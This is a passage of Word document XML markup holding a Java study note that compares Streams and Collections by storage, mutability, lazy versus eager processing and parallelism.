    <w:p w14:paraId="722A7460" w14:textId="1C448EE6" w:rsidR="00277CE2" w:rsidRPr="00CE4B95" w:rsidRDefault="00527DFE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="141" w:name="_Toc196307621"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference</w:t>
      </w:r>
      <w:r w:rsidR="00277CE2" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> between Stream and </w:t>
      </w:r>
      <w:r w:rsidR="00645695" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00277CE2" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ollections?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="141"/>
    </w:p>
    <w:p w14:paraId="05CFA967" w14:textId="45070A44" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stream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Collections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are both used for working with data, but they have different purposes, functionalities, and characteristics. Here's a detailed comparison:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA29649" w14:textId="77777777" w:rsidR="00F609ED"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079AE0D">
          <v:rect id="_x0000_i1473" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6C1509" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED"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Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6FBBAF" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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llection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7FF201" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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Collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a data structure (like a list, set, or map) that stores and organizes a group of elements. It is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java.util</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> package and is the root interface of the Java Collections Framework (e.g., List, Set, Queue, Map).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1373EA81" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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llections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used to store, retrieve, manipulate, and aggregate data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F81E0B" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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ream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A57B44" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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Stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an abstraction introduced in Java 8, allowing functional-style operations on sequences of elements (such as collections, arrays, or I/O channels).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C76AF6D" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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reams</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> do not store data; they represent a sequence of elements from a source (like a collection) and support a variety of operations (like filtering, mapping, and reducing) that can be chained together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0034CCA2" w14:textId="77777777" w:rsidR="00F609ED"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716FC58">
          <v:rect id="_x0000_i1474" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="049B02C6" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED"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Key Characterist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9"/>
        <w:gridCol w:w="4554"/>
        <w:gridCol w:w="4351"/>
      </w:tblGrid>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="7B953B10" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49C627F1" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED"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51F731BC" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED"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llections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="133BE38C" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED"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reams</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="6F115D11" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2707C069"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orage of Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F6D4FB0"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ores data</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: A collection contains and holds data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F970115"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oes not store data</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: A stream is a sequence of elements that can be processed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="6648A366" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="082C383C"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ype</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23760E5F"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presents a data structure (e.g., List, Set).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03120B50"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Represents a </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>sequence of elements</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> from a source.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="1334D705" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BB167C3"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utability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FE656F1"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utable</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: Collections can be modified (e.g., adding/removing elements).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32A230BF"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mmutable</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: Streams don't modify the source. They produce a new result.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="01F65E34" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D29A72A"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perations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71FEF9FB"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perations are mostly </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>manual</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (e.g., loops).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DC8F89C"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perations are mostly </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>functional</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (using methods like map(), filter(), reduce()), and can be chained.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="3CF61682" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6388A916"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ocessing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CCB93AE"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ager processing</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: Data is processed when you explicitly call a method (e.g., forEach() or add()).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78ED26CA"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azy processing</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: Operations are executed when the stream is actually consumed (terminal operations like collect(), forEach()).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="3DF515F5" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47CA4E45"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cy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37298D20"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t parallel by default</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: Collections are single-threaded unless explicitly made parallel (e.g., CopyOnWriteArrayList).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5017D938"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rallelizable</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: Streams can be processed in parallel using parallelStream() for concurrent processing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E581EF5" w14:textId="77777777" w:rsidR="00F609ED"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7DB8AB8">
          <v:rect id="_x0000_i1475" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A89DBC" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED"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Modifications and Data Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B7EB2D" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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llections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC5C177" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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ollections </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>store data</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and you can </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>modify the data</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> directly (e.g., adding or removing elements).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9BBAD5" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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perations on collections are generally </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eager</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>—they happen immediately when called.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145B8976" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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reams</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B52A58" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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reams </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>do not modify the underlying data source</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; instead, they process elements through a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pipeline of operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The operations are executed when a terminal operation is invoked (e.g., collect(), forEach(), reduce()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F262778" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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reams allow </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional-style operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and they can be processed lazily, meaning that intermediate operations are not executed until a terminal operation is performed.</w:t>
      </w:r>
    </w:p>
